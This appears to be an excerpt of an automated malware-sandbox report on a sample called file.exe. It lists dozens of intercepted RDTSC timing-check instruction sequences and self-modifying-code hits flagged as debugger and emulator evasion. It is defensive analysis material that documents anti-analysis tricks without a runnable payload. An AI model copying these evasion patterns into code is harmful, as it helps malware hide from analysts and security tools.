Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F361F1 second address: F36206 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jl 00007F4224E6F2A6h 0x0000000c popad 0x0000000d jc 00007F4224E6F2ACh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F36206 second address: F3620A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F363B5 second address: F363E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F4224E6F2C5h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F363E0 second address: F36419 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F4224DD3FD6h 0x00000009 jo 00007F4224DD3FD6h 0x0000000f jmp 00007F4224DD3FDAh 0x00000014 popad 0x00000015 jmp 00007F4224DD3FE8h 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F36419 second address: F36455 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007F4224E6F2A6h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F4224E6F2B8h 0x00000014 jmp 00007F4224E6F2B5h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F36455 second address: F3645B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F36586 second address: F3658A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3658A second address: F3659B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4224DD3FDBh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3672F second address: F3673C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jno 00007F4224E6F2A6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3689A second address: F368A4 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4224DD3FD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F368A4 second address: F368BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4224E6F2B4h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F368BD second address: F368E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a je 00007F4224DD3FDEh 0x00000010 push esi 0x00000011 pop esi 0x00000012 jng 00007F4224DD3FD6h 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F4224DD3FDBh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F368E2 second address: F368E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F35577 second address: F35598 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007F4224DD3FE8h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F39BAE second address: F39BB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F39BB2 second address: F39BB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3EB5F second address: F3EB65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3E9C9 second address: F3E9D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F4224DD3FD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F41ECB second address: F41EFB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4224E6F2AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F4224E6F2B2h 0x0000000f push eax 0x00000010 push edx 0x00000011 jc 00007F4224E6F2A6h 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F41EFB second address: F41EFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F418F2 second address: F418F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F418F6 second address: F418FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F41BB3 second address: F41BE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4224E6F2AAh 0x00000008 pushad 0x00000009 popad 0x0000000a jp 00007F4224E6F2A6h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F4224E6F2B6h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F41BE5 second address: F41C16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4224DD3FDBh 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F4224DD3FE1h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F4224DD3FDBh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F41C16 second address: F41C1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4ECBF second address: F4ECCF instructions: 0x00000000 rdtsc 0x00000002 je 00007F4224DD3FD6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4EE4F second address: F4EE56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4EE56 second address: F4EE62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F4224DD3FD6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4EE62 second address: F4EE66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4EE66 second address: F4EE7F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4224DD3FE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4EE7F second address: F4EE83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4EE83 second address: F4EE92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4EE92 second address: F4EE96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4EE96 second address: F4EEBB instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4224DD3FD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4224DD3FE7h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4EEBB second address: F4EEBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4EEBF second address: F4EEC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4EEC3 second address: F4EEC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F541FC second address: F54208 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4224DD3FD6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F54208 second address: F54216 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jc 00007F4224E6F2A6h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F54216 second address: F54220 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4224DD3FD6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6CD31 second address: F6CD61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F4224E6F2ADh 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007F4224E6F2B9h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6B790 second address: F6B79A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6B79A second address: F6B7A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F4224E6F2A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6B7A4 second address: F6B7C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4224DD3FE7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6B7C3 second address: F6B7C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6B7C7 second address: F6B7CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6B935 second address: F6B945 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F4224E6F2A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6B945 second address: F6B9B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4224DD3FE7h 0x00000007 jnp 00007F4224DD3FD6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jbe 00007F4224DD3FE2h 0x00000015 pushad 0x00000016 ja 00007F4224DD3FD6h 0x0000001c push esi 0x0000001d pop esi 0x0000001e push eax 0x0000001f pop eax 0x00000020 popad 0x00000021 popad 0x00000022 pushad 0x00000023 jmp 00007F4224DD3FE8h 0x00000028 pushad 0x00000029 jbe 00007F4224DD3FD6h 0x0000002f jmp 00007F4224DD3FDAh 0x00000034 ja 00007F4224DD3FD6h 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6BB07 second address: F6BB0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6BB0F second address: F6BB3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jne 00007F4224DD3FD6h 0x0000000e push esi 0x0000000f pop esi 0x00000010 push esi 0x00000011 pop esi 0x00000012 popad 0x00000013 jmp 00007F4224DD3FE1h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b push ecx 0x0000001c push esi 0x0000001d pop esi 0x0000001e pop ecx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6BC90 second address: F6BCB2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 pop edx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007F4224E6F2A8h 0x00000012 jnp 00007F4224E6F2AEh 0x00000018 jns 00007F4224E6F2A6h 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F78795 second address: F78799 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F78799 second address: F787AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4224E6F2ADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F787AA second address: F787AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7F0A7 second address: F7F0B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007F4224E6F2A6h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7F0B6 second address: F7F0D1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F4224DD3FDBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c push esi 0x0000000d jl 00007F4224DD3FE2h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7F0D1 second address: F7F0EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F4224E6F2A6h 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F4224E6F2ADh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8CC47 second address: F8CC4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8CC4B second address: F8CC51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8CC51 second address: F8CC57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8CC57 second address: F8CC5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8CADD second address: F8CAE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8CAE4 second address: F8CAF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4224E6F2ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8CAF5 second address: F8CAFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8CAFE second address: F8CB02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8F59A second address: F8F5A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F4224DD3FD6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8F731 second address: F8F748 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4224E6F2B3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8F748 second address: F8F766 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4224DD3FE7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9D7F0 second address: F9D807 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jnc 00007F4224E6F2A8h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f jl 00007F4224E6F2A6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA0F45 second address: FA0F82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4224DD3FE7h 0x00000009 popad 0x0000000a jbe 00007F4224DD3FEEh 0x00000010 jmp 00007F4224DD3FE6h 0x00000015 push edi 0x00000016 pop edi 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA1545 second address: FA1557 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 ja 00007F4224E6F2A6h 0x00000009 pop ecx 0x0000000a jo 00007F4224E6F2ACh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA1557 second address: FA1563 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA1AB7 second address: FA1ABD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA1ABD second address: FA1AC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA1AC2 second address: FA1AEC instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4224E6F2B2h 0x00000008 jmp 00007F4224E6F2B0h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ecx 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA1D9C second address: FA1DA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA66D8 second address: FA66E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA915D second address: FA9193 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jbe 00007F4224DD3FD6h 0x0000000d push edx 0x0000000e pop edx 0x0000000f jno 00007F4224DD3FD6h 0x00000015 popad 0x00000016 jbe 00007F4224DD3FD8h 0x0000001c pushad 0x0000001d popad 0x0000001e jg 00007F4224DD3FD8h 0x00000024 popad 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F4224DD3FDDh 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAB09B second address: FAB0B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4224E6F2B0h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE028B second address: 4CE028F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE028F second address: 4CE0295 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE0295 second address: 4CE029B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE029B second address: 4CE029F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE029F second address: 4CE02BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4224DD3FE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop ecx 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE02BD second address: 4CE02ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4224E6F2ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c call 00007F4224E6F2B4h 0x00000011 mov ecx, 091EBD81h 0x00000016 pop esi 0x00000017 push eax 0x00000018 push edx 0x00000019 mov ecx, edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE0346 second address: 4CE034A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE034A second address: 4CE0365 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4224E6F2B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE0365 second address: 4CE037D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4224DD3FE4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE037D second address: 4CE03A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F4224E6F2B7h 0x0000000f pop ebp 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 movzx esi, dx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC3277 second address: EC327D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC34C9 second address: EC34CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE0B87 second address: 4CE0C2A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4224DD3FDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push esi 0x0000000c pushfd 0x0000000d jmp 00007F4224DD3FDBh 0x00000012 sub ecx, 234823BEh 0x00000018 jmp 00007F4224DD3FE9h 0x0000001d popfd 0x0000001e pop eax 0x0000001f call 00007F4224DD3FE1h 0x00000024 pushfd 0x00000025 jmp 00007F4224DD3FE0h 0x0000002a xor ecx, 0CE303E8h 0x00000030 jmp 00007F4224DD3FDBh 0x00000035 popfd 0x00000036 pop esi 0x00000037 popad 0x00000038 mov ebp, esp 0x0000003a jmp 00007F4224DD3FDFh 0x0000003f pop ebp 0x00000040 pushad 0x00000041 call 00007F4224DD3FE4h 0x00000046 pushad 0x00000047 popad 0x00000048 pop ecx 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c popad 0x0000004d rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: D119CD instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: D118C1 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: EB6C04 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: EB680B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: EE15BE instructions caused by: Self-modifying code

